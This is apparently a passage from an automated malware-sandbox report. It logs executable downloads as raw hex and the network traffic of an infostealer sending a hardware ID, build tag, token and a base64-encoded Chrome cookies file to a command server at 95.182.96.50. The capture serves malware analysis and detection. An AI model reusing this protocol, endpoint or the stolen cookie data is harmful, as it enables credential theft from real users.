00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 95.182.96.50Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 95.182.96.50Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 31 37 38 38 42 38 39 32 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 69 6e 74 65 61 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="hwid"1D1788B892973370857647------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build"mainteam------DAECGCGHCGHCAKECBKJK--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"browsers------JJEGCBGIDHCAKEBGIIDB--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 95.182.96.50Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"plugins------ECGDHDHJEBGHJKFIECBG--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIIDHost: 95.182.96.50Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 45 42 47 44 48 44 41 46 48 4a 4b 45 47 49 49 44 2d 2d 0d 0a Data Ascii: ------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------BKJKEBGDHDAFHJKEGIIDContent-Disposition: form-data; name="message"fplugins------BKJKEBGDHDAFHJKEGIID--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFHost: 95.182.96.50Content-Length: 7763Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /fee3b98529eb4b43/sqlite3.dll HTTP/1.1Host: 95.182.96.50Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 95.182.96.50Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 45 7a 4d 44 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 6b 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 77 4e 44 6b 35 43 55 35 4a 52 41 6b 31 4d 54 45 39 61 7a 6c 30 56 44 4e 78 4e 31 6c 6d 61 44 46 75 65 46 39 47 55 32 77 77 4e 6b 59 31 56 55 56 66 64 6d 52 68 52 6c 46 79 5a 57 6c 48 53 32 55 78 59 55 52 4f 4f 44 4e 4e 5a 58 5a 6c 52 44 64 51 54 44 46 53 57 6c 68 32 59 54 52 7a 4c 57 35 47 59 7a 6c 33 59 56 46 70 4f 55 78 30 53 32 46 32 64 56 52 4a 59 6d 45 34 54 56 56 72 62 30 64 31 4e 54 68 46 4f 45 55 34 4d 57 64 33 51 6c 39 55 56 30 6f 30 54 6d 63 74 54 47 5a 44 64 6e 70 6f 5a 57 30 33 63 6b 35 79 61 46 70 52 4d 6d 46 48 64 6b 70 61 4f 57 63 79 56 46 6c 6f 63 58 67 79 56 7a 4a 50 4e 45 55 33 64 55 68 52 65 6c 42 72 4d 33 5a 31 54 48 5a 4e 54 48 68 47 57 46 70 7a 63 55 55 32 54 6d 52 42 56 6d 6c 52 52 45 56 44 52 33 42 76 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlF
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"b6d211765f31d804e7cc27dce8c6fe451da0af4c69d9ed38520886567a0390885895c589------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic	HTTP traffic detected: POST /2aced82320799c96.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 95.182.96.50Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 64 32 31 31 37 36 35 66 33 31 64 38 30 34 65 37 63 63 32 37 64 63 65 38 63 36 66 65 34 35 31 64 61 30 61 66 34 63 36 39 64 39 65 64 33 38 35 32 30 38 38 36 35 36 37 61 30 33 39 30 38 38 35 38 39 35 63 35 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; 